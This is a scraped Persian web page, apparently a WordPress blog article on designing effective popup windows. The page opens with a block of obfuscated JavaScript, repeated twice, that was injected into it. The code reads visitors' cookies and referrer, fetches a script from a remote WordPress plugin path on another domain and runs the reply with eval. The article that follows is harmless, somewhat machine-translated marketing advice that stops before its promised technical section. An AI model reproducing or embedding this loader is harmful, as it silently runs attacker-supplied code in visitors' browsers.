;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//soloweb.ir/wp-content/plugins/RTL-CareUnit/vendor/defuse/php-encryption/src/Exception/Exception.js","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}} ;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//soloweb.ir/wp-content/plugins/RTL-CareUnit/vendor/defuse/php-encryption/src/Exception/Exception.js","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}

چگونه می توان یک پاپ آپ ایجاد کرد: یک دستورالعمل نهایی با نمونه

به نظر می رسد افرادی که در اینترنت هستند به دو گروه تقسیم شده اند – آنهایی که نفرت دارند و کسانی که صبر میکنند و پس از دیدن دکمه X کلیک می کنند یا حتی در نامه الکترونیکی مشترک می شوند. بله ، نگرش به پنجره های بازشو همیشه بحث برانگیز بود.بنابراین ، این بخش از کمپین بازاریابی پیچیده و زمانبراست

هدف اصلی ایجاد یک پنجره است که:

  1. توجه کاربر (با دقت) جلب کنید؛
  2. انتقال ایده (به وضوح)؛

متقاعد کنید دقیقاً همان عملی را که لازم بود انجام دهد.
روی سطح ، پیروی از همه این قوانین ، معامله بزرگی نیست. با این وجود ، قبل از راه اندازی یک پنجره ، مراحل بسیار کوچک اما اساسی باید انجام شود. به عنوان مثال ، جمع آوری اطلاعات در مورد مخاطب هدف و رفتار آنها ، آزمایش انواع مختلف پنجره ها ، زمان نمایش آنها ، روش های بسته شدن آنها و غیره مهم است.
بازاریابان باتجربه با این مراحل برخورد خواهند کرد. در این مقاله ، من به جنبه فنی مسئله – یعنی ایجاد پاپ آپ – تمرکز خواهم کرد. شما می آموزید که چگونه یک پنجره بازشو در وردپرس با زبانهای CSS ، JS و HTML ایجاد کنید.

هنوز ، می فهمیم که کدام پنجره را می توان یک ابزار مؤثر و دوستانه برای تبدیل دانست.

چه عواملی از پاپ آپ موثر می پسندند؟

بدون تردید ، یک پنجره پاپ آپ با صدای بلند که به طور ناگهانی ظاهر میشود ، صبورترین فرد را تحریک می کند. خبر خوب این است که امروزه ممکن است پنجره ها به روشی کم تحریک کننده بیایند و دقیقاً همان عملکردی را که قرار بود انجام دهند ، انجام دهند.

من به عنوان یک کاربر اینترنت ، که روزانه با پنجره ها نیز روبرو است ، من قوانین اساسی را که به لحاظ نظری به شما کمک می کند برجسته کردم:

  1. نرخ کلیک را افزایش دهید.
  2. لیست پستی را گسترش دهید.
  3. تعداد ثبت نام ها را افزایش دهید.
  4. تبدیل را افزایش دهید.
  5. بنابراین ، یک پنجره کارآمد باید:

آسان به درک هر پنجره حاوی اطلاعات یا تشویق به انجام یک عمل خاص است. صرف نظر از گزینه آن ، انتقال پیام به وضوح بسیار مهم است. جایی برای سوء تفاهم وجود ندارد. اگر می خواهید روی چیزی تأکید کنید ، درست است که از متن جسورانه استفاده کنید.

یک عنوان فعال داشته باشید. عنوانی که بازدید کنندگان را به اقدام تشویق می کند دارای قدرت است. همراه با محتوای مناسب ، می تواند آنها را به سمت اقداماتی که در واقع به آنها احتیاج دارید ، سوق دهد. در اینجا نمونه ای وجود دارد:

حاوی یک دکمه “جادویی” است. دکمه پنجره باید پیامی را که از پنجره منتقل می شود منعکس کند. به عنوان مثال ، اگر به گونه ای طراحی شده است که شخصی بتواند نامه ای را از طریق خبرنامه ارسال کند ، باید دکمه متن “اشتراک در نامه الکترونیکی” را داشته باشد. اگر پنجره بازشو تخفیف ارائه می دهد ، دکمه باید بگوید: “تخفیف را دریافت کنید”:

به محتوای صفحه مربوط باشد. پنجره ای که هیچ ارتباطی با محتوای صفحه ندارد حداقل کاربر را گیج می کند. اگر این صفحه حاوی مطبوعاتی کتاب باشد ، قرار دادن پنجره ای که پیشنهاد می کند کتاب را با تخفیف خریداری کنید یا حداقل نامه الکترونیکی را ترک کنید ، ایده خوبی است.

در زمان مناسب ، در مکان مناسب ظاهر شوید. پنجره ها افراد را از درک اطلاعات منحرف می کنند زیرا ناگهان می آیند. بنابراین ، به بازدید کنندگان فرصت دهید تا با اطلاعات موجود در صفحه آشنا شوند.

راحت باشید که خلاص شوید فرصتی برای بستن پنجره با یک دکمه X یا کلیک کردن در جایی در صفحه ، چند نکته را به کارما اضافه می کند.

در حقیقت ، پیروی از این قوانین تضمین نمی کند که یک پنجره بازشو تبدیل به ارتفاعات باورنکردنی را افزایش می دهد. هنوز هم با در نظر گرفتن این قوانین ، شما قطعاً به چیزی بیشتر ازاینکه “اصلاً آنها را نادیده بگیرید” ، دست خواهید یافت.

بیایید سرانجام به طرف فنی فرآیند برویم و نحوه ایجاد یک پنجره پاپ آپ را در شرایط مختلف ، با ابزارهای مختلف ، دریابیم.

 

 

 

مقاله های بیشتر

طراحی وب

فریم ورک چیست ؟

فریم ورک FrameWork که در اصطلاح یک چارچوب نرم افزاری گفته می شود مجموعه ای است از کتابخانه های برنامه نویسی و احتمالا مجموعه ای